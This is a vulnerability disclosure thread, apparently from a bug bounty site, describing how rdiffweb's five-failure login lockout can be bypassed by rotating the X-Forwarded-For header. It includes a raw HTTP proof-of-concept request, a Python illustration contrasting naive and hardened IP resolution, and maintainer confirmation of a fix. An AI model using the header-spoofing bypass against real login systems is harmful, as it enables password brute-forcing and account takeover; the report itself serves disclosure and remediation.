Bypass IP detection to brute-force password in ikus060/rdiffweb


Reported on

Sep 14th 2022


In the login API, by default the IP address is blocked when a user tries to log in incorrectly more than 5 times, but we can bypass this mechanism by abusing the X-Forwarded-For header to bypass IP detection and perform a password brute-force.

Proof of Concept

POST /login/ HTTP/1.1
Cookie: session_id=79c34d46cd0e592e066e1a7b128cffee4972d4f7
Content-Length: 42
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: // Change IP
Connection: close


Video POC


This vulnerability allows the attacker to brute-force the admin's password, perform denial of service attacks, ...
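The root cause in the report is that the login throttle keys its failure counter on an address taken straight from X-Forwarded-For, so any client talking directly to the application can pick a fresh "IP" per request. The following is an added illustration, not rdiffweb's own code: a naive resolver beside a hardened one that honours X-Forwarded-For only when the TCP peer is a configured reverse proxy, and a tiny lockout counter driven by each resolver over a constructed sequence of failed logins. The trusted-proxy range, peer addresses and header values are all constructed for the example. The hardened resolver also walks the chain from the right, which matters when a proxy appends the real client address to an attacker-supplied header instead of replacing it.

```python
import ipaddress
from collections import defaultdict

MAX_FAILURES = 5                      # the report: blocked after 5 bad logins
TRUSTED_PROXIES = ["10.0.0.0/8"]      # constructed: where our reverse proxies live


def client_ip_naive(remote_addr, headers):
    """Vulnerable pattern: believe X-Forwarded-For from anyone (first hop wins)."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_trusted(remote_addr, headers, trusted_proxies):
    """Hardened pattern (hypothetical helper): only honour X-Forwarded-For when
    the TCP peer is a trusted proxy, then take the right-most hop that is not
    itself a trusted proxy. Anything malformed falls back to the peer address."""
    nets = [ipaddress.ip_network(n) for n in trusted_proxies]

    def trusted(addr):
        try:
            return any(ipaddress.ip_address(addr) in n for n in nets)
        except ValueError:
            return False

    if not trusted(remote_addr):
        # Direct client: the header is attacker-controlled, ignore it entirely.
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not trusted(hop):
            try:
                return str(ipaddress.ip_address(hop))
            except ValueError:
                break  # garbage hop: do not let it become a counter key
    return remote_addr


def client_ip_hardened(remote_addr, headers):
    return client_ip_trusted(remote_addr, headers, TRUSTED_PROXIES)


class LoginThrottle:
    """Minimal per-IP lockout: MAX_FAILURES bad attempts, then 'blocked'."""

    def __init__(self, resolver):
        self.resolver = resolver
        self.failures = defaultdict(int)

    def attempt(self, remote_addr, headers, password_ok):
        ip = self.resolver(remote_addr, headers)
        if self.failures[ip] >= MAX_FAILURES:
            return "blocked"
        if password_ok:
            self.failures[ip] = 0
            return "ok"
        self.failures[ip] += 1
        return "denied"


def simulate(resolver, attempts=8):
    """One peer (198.51.100.7, constructed) talking directly to the app sends
    `attempts` wrong passwords, rotating X-Forwarded-For on every request."""
    throttle = LoginThrottle(resolver)
    results = []
    for i in range(attempts):
        headers = {"X-Forwarded-For": f"203.0.113.{i}"}   # constructed spoof
        results.append(throttle.attempt("198.51.100.7", headers, password_ok=False))
    return results


if __name__ == "__main__":
    print("naive:   ", simulate(client_ip_naive))
    print("hardened:", simulate(client_ip_hardened))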

ikus060/rdiffweb maintainer has acknowledged this report 17 days ago
Patrik Dufresne
16 days ago


@co0k13-cypher This is true only if Rdiffweb is not behind a reverse proxy. When rdiffweb is behind a reverse proxy the X-Forward-* headers get replaced by apache or nginx. In that case the vulnerability is not reproducible.

16 days ago


In the demo video I'm doing the attack right on the site itself; while the vulnerability doesn't cover all cases, that doesn't mean it doesn't happen.

Patrik Dufresne validated this vulnerability 16 days ago

I confirm the vulnerability.

Chiencp has been awarded the disclosure bounty
Patrik Dufresne
16 days ago


@co0k13-cypher May you please change the affected version to 2.4.2 and earlier?

Patrik Dufresne confirmed that a fix has been merged on 28258e 16 days ago
Patrik Dufresne has been awarded the fix bounty
15 days ago


I'm sorry, the report was closed so I can't edit!

Patrik Dufresne
15 days ago


@admin May you help to change the affected version to 2.4.2 and earlier?

Jamie Slome
15 days ago


Sorted :)
